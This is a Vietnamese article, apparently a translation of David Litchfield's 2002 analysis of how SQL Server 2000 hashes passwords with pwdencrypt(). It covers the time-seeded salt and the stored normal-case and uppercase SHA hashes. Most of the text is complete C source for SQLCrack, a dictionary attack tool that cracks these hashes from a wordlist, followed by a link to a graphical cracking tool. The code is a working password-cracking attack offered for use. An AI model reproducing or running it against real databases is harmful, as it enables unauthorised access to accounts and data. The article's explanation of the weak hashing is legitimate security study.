You are on page 1of 6

Giải mã password của SQL Server :

trang này đã được đọc lần

Cách thức lưu trữ password của SQl Server:


SQL server sử dụng một hàm undocumented ( tạm gọi là hàm không cơ sở ) ,
pwdencrypt() để mã hoá mã số của người dùng , chúng được lưu trữ trong bảng
sysxlogin của cơ sở dữ liệu chính (master database) . Đây có lẽ là điều mà nhiều
người biết . Điều không được công bố là những yếu tố của hàm pwdencrypy() . Bài
viết sau sẽ thảo luận về hàm này cũng như những điểm yếu trong cách mã hoá mã
số của SQL Server .

Một mã số khi đã mã hoá trông ra sao:


Sử dụng phương pháp phân tích truy vấn ( Query Analyzer) , hoặc công cụ SQL mà
bạn chọn , thực thi đoạn truy vấn lựa chọn mã số từ master.dbo.sysxlogins tại
name=”sa” . Bạn sẽ nhận được đoạn trả về tương tự như đoạn sau:
0x01008D504D65431D6F8AA7AED333590D7DB1863CBFC98186BFAE06EB6B327EFA
5449E6
F649BA954AFF4057056D9B
Đó là mã hoá của mã số của tài khoản truy nhập “sa” trong máy của tôi.
Chúng ta có thể nhận được gì từ pwdencrypt() về cách mã hoá?
Thời gian
Truy vần lựa chọn pwdencrypt(“foo”) tạo ra
0x0100544115053E881CA272490C324ECE22BF17DAF2AB96B1DC9A7EAB644BD218
969D09FFB97F5035CF7142521576
nhưng chỉ vài giây sau vẫn với truy vấn pwdencrypt ta lại nhận được
0x0100D741861463DFFF7B5282BF4E5925057249C61A696ACB92F532819DC22ED6
B
E374591FAAF6C38A2EADAA57FDF
Hai đoạn mã hoá trên khác nhau nhưng đầu vào foo thì lại giống nhau .Từ đây ta có
thể suy luận ra rằng thời gian đóng một vai trò quan trọng trong việc tạo ra và lưu trữ
password . Điều này dẫn tới hai người sử dụng khác nhau sẽ có mã hoá khác nhau
cho dù họ cùng dùng 1 mã số .
Trường hợp
Chạy đoạn truy vần pwdencrypt(“AAAAAA”) sẽ trả về
0x01008444930543174C59CC918D34B6A12C9CC9EF99C4769F819B43174C59CC91
8
D34B6A12C9CC9EF99C4769F819B
Ta thấy rằng có lẽ có 2 password được tạo ra ở đây. Hãy để tôi chia nó ra
0x0100
84449305
43174C59CC918D34B6A12C9CC9EF99C4769F819B
43174C59CC918D34B6A12C9CC9EF99C4769F819B
Bạn có thể nhận ra 40 kí tự cuối cùng giông như 40 kí tự áp chót . Như vậy có lẽ
password đã được lưu trữ 2 lần? 1 trong chúng là password theo kiểu bình thường ,
cái còn lại là kiểu viết hoa của password.
Clear Salt
Từ những gì chúng ta biết , sự thay đổi thời gian dẫn tới thay đổi password mã hoá ,
pass mã hoá này phải sẵn sàng trước khi user đăng nhập vào hệ thống và phải có sự
đối chiếu giữa pass mã hoá và pass của họ trong cơ sở dữ liệu .Trong kết quả trên
8449305 là đầu ra của pass qua hàm pwdencrypt() . Kết quả nhận được thông qua
trình tự sau : Hàm time() của C được gọi và là khởi đầu cho hàm srand(). Srand() cung
cấp đầu vào cho hàm rand() tạo ra một số nguyên ngẫu nhiên . SQl chuyển số này
thành kiều short , ta gọi số này là SN1. Hàm rand() một lần nữa được thực thi và tạo
nên 1 số ngẫu nhiên khác , ta gọi là SN2. SN1 và SN2 được kết hợp để tạo ra 1 số
nguyên , SN1 trở thành phần chính và SN2 là phần phụ , SN1 và SN2 tạo thành salt .
Salt trở thành password.
Mã hoá password
Mã số của người dùng được chuyển thành UNICODE nếu như chưa phải là kiểu này .
Salt sau đó được nối thêm vào sau cùng .Tổ hợp này được gửi tới hàm mã hoá trong
advapi32.dll để tạo ra mã hoá sử dụng thuật toán mã hoá hoặc SHA.Sau đó password
được chuyển sang dạng upper-case( chữ hoa) , salt được gắn vào cuối và một SHA
khác được tạo ra .
0x0100 Phần đầu cố định
84449305 Salt từ 2 hàm rand()
43174C59CC918D34B6A12C9CC9EF99C4769F819B Mã hoá SHA chữ thường
43174C59CC918D34B6A12C9CC9EF99C4769F819B Mã hoá SHA chữ hoa
Quá trình xác thực
Khi một người dùng xác nhập vào SQL Server các quá trình sau diễn ra . Đầu tiên SQl
Sever xác thực password của người này trong cơ sở dữ liệu và xuất “salt” như
84449305 trong ví dụ nêu trên.Salt này được gắn vào sau password của người dùng
tạo ra SHA. Tổ hợp này được so sánh với tổ hợp trong cơ sở dữ liệu và nếu giống thì
OK .
Sự kiểm tra password của SQL Server
Quá trình này được thực thi gần giống như quá trình xác thực. Tuy nhiên đầu tiên phải
tạo ra tổ hợp từ tổ hợp chữ hoa .
Mã nguồn cho một công cụ tấn công đơn giản theo kiểu từ điển
/////////////////////////////////////////////////////////////////////////////////
//
// SQLCrackCl
//
// Chương trình tấn công theo kiểu từ điển
// tổ hợp pass chữ hoa . Một khi
// đã tìm ra thì thử mọi trường
// hợp chữ thường có thể
//
// Đoạn mã viết bởi David Litchfield to
// để tấn công password của Microsoft SQL Server 2000
// Nó có thể được thực thi mà không sử dụng CryptoAPI.
//
// (Biên dịch với VC++ và liên kết với thư viện advapi32.lib
// Chắc chắn rằng Platform SDK cũng đã được cài đặt!)
//
//////////////////////////////////////////////////////////////////////////////////
#include <stdio.h>
#include <windows.h>
#include <wincrypt.h>
FILE *fd=NULL;
char *lerr = "\nLength Error!\n";
int wd=0;
int OpenPasswordFile(char *pwdfile);
int CrackPassword(char *hash);
int main(int argc, char *argv[])
{
int err = 0;
if(argc !=3)
{
printf("\n\n*** SQLCrack *** \n\n");
printf("C:\\>%s hash passwd-file\n\n",argv[0]);
printf("David Litchfield (david@ngssoftware.com)\n");
printf("24th June 2002\n");
return 0;
}
err = OpenPasswordFile(argv[2]);
if(err !=0)
{
return printf("\nThere was an error opening the password file %s\n",argv[2]);
}
err = CrackPassword(argv[1]);
fclose(fd);
printf("\n\n%d",wd);
return 0;
}
int OpenPasswordFile(char *pwdfile)
{
fd = fopen(pwdfile,"r");
if(fd)
return 0;
else
return 1;
}
int CrackPassword(char *hash)
{
char phash[100]="";
char pheader[8]="";
char pkey[12]="";
char pnorm[44]="";
char pucase[44]="";
char pucfirst[8]="";
char wttf[44]="";
char uwttf[100]="";
char *wp=NULL;
char *ptr=NULL;
int cnt = 0;
int count = 0;
unsigned int key=0;
unsigned int t=0;
unsigned int address = 0;
unsigned char cmp=0;
unsigned char x=0;
HCRYPTPROV hProv=0;
HCRYPTHASH hHash;
DWORD hl=100;
unsigned char szhash[100]="";
int len=0;
if(strlen(hash) !=94)
{
return printf("\nThe password hash is too short!\n");
}
if(hash[0]==0x30 && (hash[1]== 'x' || hash[1] == 'X'))
{
hash = hash + 2;
strncpy(pheader,hash,4);
printf("\nHeader\t\t: %s",pheader);
if(strlen(pheader)!=4)
return printf("%s",lerr);
hash = hash + 4;
strncpy(pkey,hash,8);
printf("\nRand key\t: %s",pkey);
if(strlen(pkey)!=8)
return printf("%s",lerr);
hash = hash + 8;
strncpy(pnorm,hash,40);
printf("\nNormal\t\t: %s",pnorm);
if(strlen(pnorm)!=40)
return printf("%s",lerr);
hash = hash + 40;
strncpy(pucase,hash,40);
printf("\nUpper Case\t: %s",pucase);
if(strlen(pucase)!=40)
return printf("%s",lerr);
strncpy(pucfirst,pucase,2);
sscanf(pucfirst,"%x",&cmp);
}
else
{
return printf("The password hash has an invalid format!\n");
}
printf("\n\n Trying...\n");
if(!CryptAcquireContextW(&hProv, NULL , NULL , PROV_RSA_FULL ,0))
{
if(GetLastError()==NTE_BAD_KEYSET)
{
// KeySet does not exist. So create a new keyset
if(!CryptAcquireContext(&hProv,
NULL,
NULL,
PROV_RSA_FULL,
CRYPT_NEWKEYSET ))
{
printf("FAILLLLLLL!!!");
return FALSE;
}
}
}
while(1)
{
// get a word to try from the file
ZeroMemory(wttf,44);
if(!fgets(wttf,40,fd))
return printf("\nEnd of password file. Didn't find the password.\n");
wd++;
len = strlen(wttf);
wttf[len-1]=0x00;
ZeroMemory(uwttf,84);
// Convert the word to UNICODE
while(count < len)
{
uwttf[cnt]=wttf[count];
cnt++;
uwttf[cnt]=0x00;
count++;
cnt++;
}
len --;
wp = &uwttf;
sscanf(pkey,"%x",&key);
cnt = cnt - 2;
// Append the random stuff to the end of
// the uppercase unicode password
t = key >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << 8;
t = t >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << 16;
t = t >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << 24;
t = t >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
// Create the hash
if(!CryptCreateHash(hProv, CALG_SHA, 0 , 0, &hHash))
{
printf("Error %x during CryptCreatHash!\n", GetLastError());
return 0;
}
if(!CryptHashData(hHash, (BYTE *)uwttf, len*2+4, 0))
{
printf("Error %x during CryptHashData!\n", GetLastError());
return FALSE;
}
CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&hl,0);
// Test the first byte only. Much quicker.
if(szhash[0] == cmp)
{
// If first byte matches try the rest
ptr = pucase;
cnt = 1;
while(cnt < 20)
{
ptr = ptr + 2;
strncpy(pucfirst,ptr,2);
sscanf(pucfirst,"%x",&cmp);
if(szhash[cnt]==cmp)
cnt ++;
else
{
break;
}
}
if(cnt == 20)
{
// Chúng ta tìm ra mã số
printf("\nA MATCH!!! Mã số là %s\n",wttf);
return 0;
}
}
count = 0;
cnt=0;
}
return 0;
}
bạn có thể thử chương trình crack password dạng giao diện đồ hoạ của NGSSoftware
tại
http://www.nextgenss.com/products/ngssqlcrack.html.

You might also like